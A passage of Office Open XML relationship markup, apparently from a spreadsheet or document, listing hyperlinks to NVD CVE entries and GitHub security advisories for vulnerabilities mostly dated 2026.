Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15431" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85028" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15984" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16649" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18406" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19224" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19769" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34968" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71506" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77233" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77263" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77830" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78438" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83595" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83625" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-7jx3-jqcp-hhgc" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37277" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-35499" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-29419" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16281" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19051" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52762" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53603" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53604" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56702" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71415" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71505" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71507" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71508" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71509" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71511" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76223" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77125" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77939" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79745" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79747" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80117" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81404" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84192" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84205" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85163" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85164" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85170" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85451" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85580" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85582" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85590" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85654" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85689" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85787" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86091" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86111" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86113" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86116" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86175" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86283" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-6rj2-96f5-chj9" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-89ff-m8wv-p99r" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-w672-239g-c3gr" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62727" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId1353" /><Relationship 